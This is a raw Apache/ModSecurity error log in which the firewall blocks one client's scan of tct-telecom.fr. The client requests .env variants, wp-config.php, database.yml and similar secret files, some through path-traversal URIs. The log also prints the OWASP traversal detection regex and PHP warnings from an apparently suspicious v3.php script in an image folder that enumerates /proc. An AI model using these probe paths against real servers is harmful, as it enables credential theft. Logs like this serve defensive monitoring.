[Tue May 12 04:50:57.907928 2026] [security2:error] [pid 1730207:tid 1730233] [client 93.123.109.165:16336] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agKVkTue9Sp-pIv_Bb638AAAAVg"]
[Tue May 12 04:50:57.908114 2026] [security2:error] [pid 1730207:tid 1730233] [client 93.123.109.165:16336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agKVkTue9Sp-pIv_Bb638AAAAVg"]
[Tue May 12 04:50:58.265120 2026] [security2:error] [pid 1825179:tid 1825215] [client 93.123.109.165:16356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkdr1yOh9TvizeziSvQAAAFE"]
[Tue May 12 04:50:58.265519 2026] [security2:error] [pid 1730175:tid 1730188] [client 93.123.109.165:16378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkXo6NvB9WXx5V-6hwwAAAQs"]
[Tue May 12 04:50:58.297170 2026] [security2:error] [pid 1730207:tid 1730233] [client 93.123.109.165:16336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkTue9Sp-pIv_Bb638AAAAVg"]
[Tue May 12 04:50:58.321340 2026] [security2:error] [pid 1825287:tid 1825307] [client 93.123.109.165:16362] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVkggpmE1yW0glLdghrAAAAMI"]
[Tue May 12 04:50:58.321495 2026] [security2:error] [pid 1825287:tid 1825307] [client 93.123.109.165:16362] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVkggpmE1yW0glLdghrAAAAMI"]
[Tue May 12 04:50:58.359239 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:16402] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVkjue9Sp-pIv_Bb638QAAAUs"]
[Tue May 12 04:50:58.359323 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:16402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVkjue9Sp-pIv_Bb638QAAAUs"]
[Tue May 12 04:50:58.359486 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:16402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVkjue9Sp-pIv_Bb638QAAAUs"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174173/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174173/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174173/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174173/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174173/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174173/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:50:58.713371 2026] [security2:error] [pid 1825287:tid 1825307] [client 93.123.109.165:16362] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkggpmE1yW0glLdghrAAAAMI"]
[Tue May 12 04:50:58.751311 2026] [security2:error] [pid 1730175:tid 1730190] [client 93.123.109.165:16414] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVkno6NvB9WXx5V-6hxgAAAQ0"]
[Tue May 12 04:50:58.751498 2026] [security2:error] [pid 1730175:tid 1730190] [client 93.123.109.165:16414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVkno6NvB9WXx5V-6hxgAAAQ0"]
[Tue May 12 04:50:58.754318 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:16402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkjue9Sp-pIv_Bb638QAAAUs"]
[Tue May 12 04:50:58.793492 2026] [access_compat:error] [pid 1820198:tid 1820210] [client 93.123.109.165:16430] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:50:59.158125 2026] [security2:error] [pid 1730175:tid 1730190] [client 93.123.109.165:16414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkno6NvB9WXx5V-6hxgAAAQ0"]
[Tue May 12 04:50:59.195970 2026] [security2:error] [pid 1825179:tid 1825210] [client 93.123.109.165:16400] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agKVk9r1yOh9TvizeziSvwAAAEw"]
[Tue May 12 04:50:59.196149 2026] [security2:error] [pid 1825179:tid 1825210] [client 93.123.109.165:16400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agKVk9r1yOh9TvizeziSvwAAAEw"]
[Tue May 12 04:50:59.380579 2026] [security2:error] [pid 1820198:tid 1820213] [client 93.123.109.165:16440] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVk81tk6y7yBJLpJos_gAAAI0"]
[Tue May 12 04:50:59.380717 2026] [security2:error] [pid 1820198:tid 1820213] [client 93.123.109.165:16440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVk81tk6y7yBJLpJos_gAAAI0"]
[Tue May 12 04:50:59.582941 2026] [security2:error] [pid 1825179:tid 1825210] [client 93.123.109.165:16400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVk9r1yOh9TvizeziSvwAAAEw"]
[Tue May 12 04:50:59.780431 2026] [security2:error] [pid 1820198:tid 1820213] [client 93.123.109.165:16440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVk81tk6y7yBJLpJos_gAAAI0"]
[Tue May 12 04:51:00.275763 2026] [security2:error] [pid 1825287:tid 1825318] [client 93.123.109.165:16464] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agKVlAgpmE1yW0glLdghsQAAAM0"]
[Tue May 12 04:51:00.275954 2026] [security2:error] [pid 1825287:tid 1825318] [client 93.123.109.165:16464] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agKVlAgpmE1yW0glLdghsQAAAM0"]
[Tue May 12 04:51:00.295489 2026] [security2:error] [pid 1730207:tid 1730211] [client 93.123.109.165:16450] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVlDue9Sp-pIv_Bb639AAAAUI"]
[Tue May 12 04:51:00.295629 2026] [security2:error] [pid 1730207:tid 1730211] [client 93.123.109.165:16450] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVlDue9Sp-pIv_Bb639AAAAUI"]
[Tue May 12 04:51:01.040459 2026] [security2:error] [pid 1730207:tid 1730211] [client 93.123.109.165:16450] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVlDue9Sp-pIv_Bb639AAAAUI"]
[Tue May 12 04:51:01.058392 2026] [security2:error] [pid 1825287:tid 1825318] [client 93.123.109.165:16464] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVlAgpmE1yW0glLdghsQAAAM0"]
[Tue May 12 04:51:01.198608 2026] [security2:error] [pid 1825287:tid 1825309] [client 93.123.109.165:16480] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVlQgpmE1yW0glLdghswAAAMQ"]
[Tue May 12 04:51:01.198752 2026] [security2:error] [pid 1825287:tid 1825309] [client 93.123.109.165:16480] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVlQgpmE1yW0glLdghswAAAMQ"]
[Tue May 12 04:51:01.257382 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.165:16468] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agKVlXo6NvB9WXx5V-6hygAAAQI"]
[Tue May 12 04:51:01.257549 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.165:16468] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agKVlXo6NvB9WXx5V-6hygAAAQI"]
[Tue May 12 04:51:01.599060 2026] [security2:error] [pid 1825287:tid 1825309] [client 93.123.109.165:16480] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVlQgpmE1yW0glLdghswAAAMQ"]
[Tue May 12 04:51:01.640873 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.165:16468] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVlXo6NvB9WXx5V-6hygAAAQI"]
[Tue May 12 04:51:01.733537 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:16488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.example"] [unique_id "agKVldr1yOh9TvizeziSwgAAAEs"]
[Tue May 12 04:51:01.733674 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:16488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.example"] [unique_id "agKVldr1yOh9TvizeziSwgAAAEs"]
[Tue May 12 04:51:01.734626 2026] [security2:error] [pid 1820198:tid 1820218] [client 93.123.109.165:16498] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVlc1tk6y7yBJLpJotAQAAAJI"]
